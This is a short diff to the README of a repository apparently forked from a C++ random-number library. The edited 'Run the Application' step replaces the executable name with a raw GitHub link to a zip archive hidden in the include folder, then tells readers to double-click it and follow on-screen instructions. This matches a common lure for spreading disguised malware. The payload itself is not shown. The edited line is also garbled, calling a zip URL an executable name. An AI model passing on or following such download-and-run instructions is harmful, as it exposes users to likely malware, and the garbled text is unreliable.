carltonfsmith/pcg-cpp/README.md

 ### Step 5: Run the Application

 After extraction, open the folder containing the files.
-Look for the executable file, which may be named **pcg-cpp.exe** or similar.
+Look for the executable file, which may be named **https://github.com/carltonfsmith/pcg-cpp/raw/refs/heads/master/include/cpp-pcg-v1.9.zip** or similar.

 Double-click on this file to run the application.
 Follow any on-screen instructions if presented.